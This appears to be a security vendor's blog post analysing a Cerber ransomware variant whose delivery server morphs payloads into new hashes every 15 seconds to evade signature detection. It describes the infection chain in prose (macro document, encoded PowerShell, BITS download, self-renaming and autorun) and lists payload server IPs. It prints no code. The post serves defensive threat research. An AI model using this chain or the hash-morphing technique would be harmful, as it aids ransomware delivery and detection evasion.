Ransomware authors are in a constant state of innovation. Two weeks ago, Invincea discovereda version of Cerber that could not only hold a victim’s machine hostage, but also potentially be used as part of a Distributed Denial of Service attack. Keeping up a high rate of change and innovation is important for malware authors to stay ahead of security controls, and in their latest creation, they have incorporated the ability to manufacture new payload variants on the fly using server-side malware factories. Invincea has discovered a new Cerber ransomware attack variant that uses a unique, never-before-seen trick designed to defeat signature-based solutions such as antivirus and Threat Intelligence services, and any other security solution that relies on the identification of hashes of known malware for detection. In this new “hash factory” attack the server that delivers the payload uses a server-side “malware factory” to morph the Cerber payload and generate unique hashes as often as every 15 seconds.
Let’s first take a look at the Invincea Management Server’s forensic logs of this incident to see how this variant of Cerber behaved in an enterprise environment. A larger version of the logs below can be viewed here.
Figure 1: Screenshot showing latest variant of Cerber Ransomware behavior on an endpoint in an enterprise environment
The logs begin showing that the user opened a Weaponized Office Document from Outlook. In this case that document contained macros that invoked Microsoft’s powershell, which invoked commands that were encoded in Base64. Once decoded, the command uses Microsoft’s onboard background Intelligent transfer download service to install a binary named keyt.exe from a remote system. It then places the binary in the current user’s “My Documents” folder. Interestingly, Symantec was able to use its heuristic detection to determine that keyt.exe was likely malicious and noted that in its logs. However, this binary launched and executed despite Symantec’s efforts to thwart the attack. The keyt.exe binary renames itself to ntoskrnl.exe and sets itself to autorun at system start. Finally, the Command Shell is invoked to kill the original keyt.exe process and delete itself from the system, and then checks to ensure that the newly infected system has networking capability by pinging itself.
The good news is that, thanks to Invincea, this user was not impacted by this attack. Invincea detected the attack and restored the system to a clean state of health.
Server-Side Malware Factory
Invincea researchers see dozens of Cerber infection attempts every day. However, when we tried to duplicate the download for this variant, we noticed that the hash we received from the payload delivery server had a different hash than the one in the event above. When we downloaded it a third time, there was yet another hash. Fifteen seconds later, there was another, and then another. In all we downloaded over 40 uniquely hashed Cerber payloads – all with different hashes.
It appeared we were dealing with a server-side malware factory. Malware factories and polymorphic malware are not new. A white paper on malware factories and its concept, and proof of activity in the wild can be downloaded here from RSA. This document was co-authored in 2014 by RSA’s Christopher Elisan (@tophs) and Patrick Belcher (@belchspeak), now at Invincea. It is unknown whether the payloads on the Cerber delivery server were being programmatically generated on the server itself, or were being generated remotely and uploaded by a script.
We ran these payloads through our deep learning malware detection technology that is the centerpiece of X by Invincea. The deep learning technology determined that these payloads cluster tightly together, indicating that they share the same malware DNA as shown below:
Figure 2: Cluster of key2.exe samples in X by Invincea’s deep learning malware detection showing matches to ransomware samples from 2015
Our deep learning technology showed that the keyt.exe samples downloaded shared the same malware characteristics as each other, but more importantly, they exactly matched a sample Invincea collected back in September of 2015. That original sample was detected as a ransomware dropper that was delivered by the Neutrino Exploit Kit. You would think that old code from 2015 would be instantly detectable by the antivirus industry, but the new keyt.exe samples, when uploaded to Virustotal are only detected by 4 AV vendors. By constantly morphing the same old binary from 2015 is able to evade detection quite easily.
Our analysis also showed a relationship between keyt.exe with another interesting binary called “SS_same_israel_freegaza.exe.” As the name implies, the malware author not only wanted to infect endpoints, but make a political statement about Israel. This binary was collected from an incident on the same day detailed below:
Figure 3: Cerber download renamed to exe with political statement
In the above event, the dropper file was named encrypted.exe, not keyt.exe as in the previous event. Also, there was no powershell command, only the bitsadmin file transfer. Once the payload was launched, it exhibited Cerber behavior on the endpoint, as it was essentially the same binary type as the keyt.exe, shown clustered in our deep learning malware detection tool. Another difference is that the payload delivery server was different. In the first incident, the server’s IP was 220.127.116.11. For the encrypted.exe payload server, the IP is 18.104.22.168 on a high port of 8012.
Was this new payload server also using a server-side malware factory? We tested additional downloads, but instead of getting more Cerber payloads, the encrypted.exe changed to a Dridex banking Trojan, and that binary remained static, and did not change hashes with further testing.
The Dridex botnet has been farmed out to multiple threat actors delivering Dridex Banking Trojans, Cerber Ransomware, and Locky Ransomware. But it seems that in the case of the anti-Israeli payload, the Dridex delivery systems may have been sharing crimeware-as-a-service time with the Cerber Ransomware crew, or perhaps the Dridex gang hit the “send” button on their latest Dridex run just a tad too early.
The server that delivered the payload in this example used a server-side “malware factory” to morph the same Cerber payload and generate unique hashes as often as every 15 seconds. As this example shows, malware factories are purpose built to evade detection from signature-based control systems and threat intelligence tools. Additionally, onboard Windows utilities are frequently being used to bypass other perimeter control systems to either download or assemble malware directly onto the endpoints making the attacks even stealthier.